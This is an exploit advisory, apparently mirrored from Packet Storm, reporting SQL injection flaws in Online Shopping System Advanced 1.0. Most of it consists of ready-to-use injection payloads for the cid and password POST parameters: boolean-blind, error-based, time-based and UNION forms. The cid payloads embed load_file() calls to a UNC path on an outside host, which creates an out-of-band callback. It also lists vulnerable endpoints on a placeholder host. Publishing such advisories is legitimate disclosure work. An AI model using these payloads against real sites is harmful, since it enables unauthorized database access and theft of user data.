Online Shopping System Advanced 1.0 SQL Injection

🗓️ 10 Oct 2022 00:00:00Reported by nu11secur1tyType

packetstorm🔗 packetstormsecurity.com👁 325 Views

Online Shopping System Advanced 1.0 SQL Injection vulnerabilit

`The online-shopping-system-advanced-1.0 suffers from multiple SQLi  
The attacker can steal all information from the database of this system.  
Status: CRITICAL  
  
[+] Exploit:  
  
```MYSQL  
Parameter: cid (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select  
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''  
OR NOT 4084=4084 AND 'icSi'='icSi  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP  
BY clause (FLOOR)  
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select  
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''  
AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT  
(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select  
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''  
AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 4 columns  
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select  
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''  
UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#  
```  
--------------------------------------------------------------------------------------------  
```MYSQL  
Parameter: password (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP  
BY clause (FLOOR)  
Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT  
7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT  
(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT  
7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on  
````  
--------------------------------------------------------------------------------------------  
  
```MYSQL  
  
```  
  
## And more:  
  
```txt  
[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid  
parameter]]  
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid  
parameter]]  
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php  
[password parameter]]  
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p  
parameter]]  
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p  
parameter]]  
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php  
[email parameter]]  
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name  
parameter]]  
```  
PoC:  
https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

10 Oct 2022 00:00Current

0.1Low risk

Vulners AI Score0.1